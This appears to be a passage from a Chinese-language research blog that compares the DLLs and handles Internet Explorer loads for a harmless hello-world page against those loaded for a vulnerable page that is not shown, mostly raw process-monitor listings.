C:\\Windows\\SysWOW64\\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\\Windows\\SysWOW64\\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\\Windows\\SysWOW64\\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\mshtml.dll.mui msi.dll Windows Installer Microsoft Corporation C:\\Windows\\SysWOW64\\msi.dll msimtf.dll Active IMM Server DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\\Windows\\SysWOW64\\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\\Windows\\SysWOW64\\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\\Windows\\SysWOW64\\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\netapi32.dll netmsg.dll 网络消息 DLL Microsoft Corporation C:\\Windows\\SysWOW64\\netmsg.dll netmsg.dll.mui 网络消息 DLL Microsoft Corporation C:\\Windows\\System32\\zh-CN\\netmsg.dll.mui netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\\Windows\\SysWOW64\\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\\Windows\\SysWOW64\\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\\Windows\\SysWOW64\\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\\Windows\\SysWOW64\\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\\Windows\\System32\\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\\Windows\\SysWOW64\\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\\Windows\\SysWOW64\\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\\Windows\\SysWOW64\\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\\Windows\\SysWOW64\\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\\Windows\\SysWOW64\\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\\Windows\\SysWOW64\\powrprof.dll profapi.dll User Profile Basic API Microsoft Corporation C:\\Windows\\SysWOW64\\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\\Windows\\SysWOW64\\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\propsys.dll.mui R000000000006.clb C:\\Windows\\Registration\\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\\Windows\\SysWOW64\\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\\Windows\\SysWOW64\\rpcrt4.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\\Windows\\SysWOW64\\scrrun.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\\Windows\\SysWOW64\\scrrun.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\\Windows\\SysWOW64\\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\\Windows\\SysWOW64\\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\\Windows\\SysWOW64\\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\\Windows\\SysWOW64\\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\\Windows\\SysWOW64\\shlwapi.dll SortDefault.nls C:\\Windows\\Globalization\\Sorting\\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\\Windows\\SysWOW64\\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\\Windows\\SysWOW64\\sspicli.dll StaticCache.dat C:\\Windows\\Fonts\\StaticCache.dat SuggestedSites.dat C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat sxs.dll Fusion 2.5 Microsoft Corporation C:\\Windows\\SysWOW64\\sxs.dll TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\\Windows\\SysWOW64\\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\\Windows\\SysWOW64\\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\\Windows\\SysWOW64\\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\\Windows\\SysWOW64\\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\\Windows\\SysWOW64\\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\\Windows\\SysWOW64\\user32.dll uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\\Windows\\SysWOW64\\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\\Windows\\SysWOW64\\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\\Windows\\SysWOW64\\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\\Windows\\SysWOW64\\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\\Windows\\SysWOW64\\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\\Windows\\SysWOW64\\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\\Windows\\SysWOW64\\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\\Windows\\SysWOW64\\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\\Windows\\SysWOW64\\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\\Windows\\SysWOW64\\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\\Windows\\SysWOW64\\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\\Windows\\SysWOW64\\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\\Windows\\SysWOW64\\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\\Windows\\System32\\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\\Windows\\System32\\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\\Windows\\System32\\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\\Windows\\SysWOW64\\ws2_32.dll
太多了,不知道问题在哪里!我单独创建一个正常的html文件,然后使用ie加载,文件内容如下:
<html>
start!
<script>
alert("hi");
</script>
</html>
运行后,
加载的dll如下:
Process: iexplore.exe Pid: 4808 Name Description Company Name Path 6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\Caches\\AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db ~FontCache-FontFace.dat C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat ~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat ~FontCache-System.dat C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\\Windows\\SysWOW64\\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\\Windows\\SysWOW64\\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\\Windows\\SysWOW64\\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\\Windows\\SysWOW64\\bcryptprimitives.dll C_1252.NLS C:\\Windows\\System32\\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\\Windows\\SysWOW64\\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\\Windows\\SysWOW64\\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\\Windows\\SysWOW64\\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\\Windows\\SysWOW64\\comdlg32.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\\Windows\\SysWOW64\\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\\Windows\\SysWOW64\\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\\Windows\\SysWOW64\\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\\Windows\\SysWOW64\\cryptsp.dll cversions.2.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db cversions.2.db C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\\Windows\\SysWOW64\\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\\Windows\\SysWOW64\\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\\Windows\\SysWOW64\\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\\Windows\\SysWOW64\\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\\Windows\\SysWOW64\\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\\Windows\\SysWOW64\\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\\Windows\\SysWOW64\\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\\Windows\\SysWOW64\\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\\Windows\\SysWOW64\\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\\Windows\\SysWOW64\\ieapfltr.dll ieframe.dll Internet 浏览器 Microsoft Corporation C:\\Windows\\SysWOW64\\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\\Windows\\SysWOW64\\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\\Windows\\SysWOW64\\iertutil.dll IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\\Windows\\SysWOW64\\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\\Program Files\\internet explorer\\zh-CN\\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\\Windows\\SysWOW64\\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\\Windows\\System32\\en-US\\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\\Windows\\SysWOW64\\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\\Windows\\SysWOW64\\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\\Windows\\SysWOW64\\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\KernelBase.dll locale.nls C:\\Windows\\System32\\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\\Windows\\SysWOW64\\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\\Windows\\System32\\zh-CN\\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\\Windows\\SysWOW64\\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\\Windows\\SysWOW64\\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\\Windows\\SysWOW64\\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\mshtml.dll.mui msimtf.dll Active IMM Server DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\\Windows\\SysWOW64\\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\\Windows\\SysWOW64\\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\\Windows\\SysWOW64\\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\\Windows\\SysWOW64\\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\netapi32.dll netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\\Windows\\SysWOW64\\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\\Windows\\SysWOW64\\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\\Windows\\SysWOW64\\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\\Windows\\SysWOW64\\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\\Windows\\System32\\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\\Windows\\SysWOW64\\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\\Windows\\SysWOW64\\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\\Windows\\SysWOW64\\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\\Windows\\SysWOW64\\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\\Windows\\SysWOW64\\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\\Windows\\SysWOW64\\powrprof.dll profapi.dll User Profile Basic API Microsoft Corporation C:\\Windows\\SysWOW64\\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\\Windows\\SysWOW64\\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\propsys.dll.mui R000000000006.clb C:\\Windows\\Registration\\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\\Windows\\SysWOW64\\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\\Windows\\SysWOW64\\rpcrt4.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\\Windows\\SysWOW64\\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\\Windows\\SysWOW64\\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\\Windows\\SysWOW64\\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\\Windows\\SysWOW64\\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\\Windows\\SysWOW64\\shlwapi.dll simsun.ttc C:\\Windows\\Fonts\\simsun.ttc SortDefault.nls C:\\Windows\\Globalization\\Sorting\\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\\Windows\\SysWOW64\\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\\Windows\\SysWOW64\\sspicli.dll StaticCache.dat C:\\Windows\\Fonts\\StaticCache.dat SuggestedSites.dat C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\\Windows\\SysWOW64\\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\\Windows\\SysWOW64\\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\\Windows\\SysWOW64\\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\\Windows\\SysWOW64\\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\\Windows\\SysWOW64\\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\\Windows\\System32\\zh-CN\\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\\Windows\\SysWOW64\\user32.dll uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\\Windows\\SysWOW64\\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\\Windows\\SysWOW64\\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\\Windows\\SysWOW64\\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\\Windows\\SysWOW64\\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\\Windows\\SysWOW64\\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\\Windows\\SysWOW64\\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\\Windows\\SysWOW64\\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\\Windows\\SysWOW64\\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\\Windows\\SysWOW64\\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\\Windows\\SysWOW64\\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\\Windows\\SysWOW64\\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\\Windows\\SysWOW64\\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\\Windows\\SysWOW64\\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\\Windows\\SysWOW64\\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\\Windows\\SysWOW64\\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\\Windows\\System32\\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\\Windows\\System32\\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\\Windows\\System32\\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\\Windows\\SysWOW64\\ws2_32.dll
我们使用diff工具比较下差异:左边是hello world正常网页,右边是有上述漏洞页面的dll清单
好了,看到核心的几个dll加载了!
明天分析下加载这几个dll的原因。
此外,还有handles的情况:
正常网页加载的如下:
Process: iexplore.exe Pid: 4808 Type Name ALPC Port \\RPC Control\\OLE34456771BE500770E5370A356D34 ALPC Port \\BaseNamedObjects\\[CoreUI]-PID(4808)-TID(1848) 47eceebc-de7c-4acb-b1fc-f85a5efe0698 Desktop \\Default Directory \\KnownDlls Directory \\KnownDlls32 Directory \\KnownDlls32 Directory \\Sessions\\1\\BaseNamedObjects Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_exhaustion_2230 Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_51402_7b Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_51402_7c Event \\KernelObjects\\MaximumCommitCondition File C:\\Windows File C:\\Users\\bonelee\\Desktop File C:\\Program Files (x86)\\Internet Explorer\\zh-CN\\iexplore.exe.mui File \\Device\\CNG File \\Device\\DeviceApi File \\Device\\KsecDD File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51 File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734 File C:\\Windows\\Registration\\R000000000006.clb File \\Device\\Nsi File C:\\Windows\\SysWOW64\\zh-CN\\ieframe.dll.mui File C:\\Windows\\SysWOW64\\zh-CN\\propsys.dll.mui File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51 File C:\\Windows\\SysWOW64\\zh-CN\\urlmon.dll.mui File C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat File C:\\Windows\\SysWOW64\\zh-CN\\mshtml.dll.mui File C:\\Windows\\Fonts\\simsun.ttc File C:\\Windows\\Fonts File C:\\Windows\\System32\\zh-CN\\mlang.dll.mui File C:\\Windows\\Fonts\\StaticCache.dat File C:\\Windows\\System32\\en-US\\imageres.dll.mui Key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options Key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options Key HKLM\\SYSTEM\\ControlSet001\\Control\\Session Manager Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale Key HKLM Key HKLM Key HKLM\\SOFTWARE\\Microsoft\\Ole Key HKCU\\Software\\Classes\\Local Settings\\Software\\Microsoft Key HKCU\\Software\\Classes\\Local Settings Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main Key HKCU Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl Key HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids Key HKLM\\SOFTWARE\\Policies Key HKCU\\Software\\Policies Key HKCU\\Software Key HKLM\\SOFTWARE\\WOW6432Node Key HKCU\\Software\\Classes Key HKCU\\Software\\Microsoft\\Internet Explorer Key HKCU\\Software\\Classes Key HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime Key HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime\\ActivatableClassId Key HKCU\\Software\\Classes Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache Key HKU Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage Key HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\Protocol_Catalog9 Key HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5 Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer Key HKCU\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\1AC14E77-02E7-4E5D-B744-2EB1AE5198B7\\PropertyBag Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\P3P\\History Key HKCU\\Software\\Classes Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts Key HKCU\\Software\\Classes\\MIME\\Database\\Content Type\\text/xml Key HKCU\\Software\\Microsoft\\Internet Explorer\\PhishingFilter Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKCU\\EUDC Key HKCU\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation Key HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\ProviderOrder Key HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder Key HKCU\\Software\\Microsoft\\FTP Key HKCU\\Software\\Microsoft\\Internet Explorer\\MINIE Mutant \\...\\!PrivacIE!SharedMem!Mutex Mutant \\Sessions\\1\\BaseNamedObjects\\SM0:4808:168:WilStaging_02 Mutant \\Sessions\\1\\BaseNamedObjects\\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa Mutant \\Sessions\\1\\BaseNamedObjects\\VERMGMTBlockListFileMutex Mutant \\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex Mutant \\Sessions\\1\\BaseNamedObjects\\SmartScreen_ClientId_Mutex Mutant \\Sessions\\1\\BaseNamedObjects\\CommunicationManager_Mutex Mutant \\Sessions\\1\\BaseNamedObjects\\ZonesCacheCounterMutex Mutant \\Sessions\\1\\BaseNamedObjects\\ZonesLockedCacheCounterMutex Mutant \\Sessions\\1\\BaseNamedObjects\\SM0:4808:64:WilError_02 Mutant \\Sessions\\1\\BaseNamedObjects\\!BrowserEmulation!SharedMemory!Mutex Mutant \\Sessions\\1\\BaseNamedObjects\\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_7B0E6F39_C::USERS:BONELEE:APPDATA:LOCAL:MICROSOFT:WINDOWS:INETCACHE:LOW:SUGGESTEDSITES.DAT Mutant \\Sessions\\1\\BaseNamedObjects\\_!SHMSFTHISTORY!_ Section \\Sessions\\1\\BaseNamedObjects\\ie_ias_00002230-0000-0000-0000-000000000000 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_9 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeUntrusted Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:1_8 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:0_7 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:2_a Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:2_c Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_3 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_4 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_5 Section \\...\\!PrivacIE!SharedMem!Settings Section \\...\\!PrivacIE!SharedMem!Counter Section \\BaseNamedObjects\\__ComCatalogCache__ Section \\Sessions\\1\\BaseNamedObjects\\windows_shell_global_counters Section 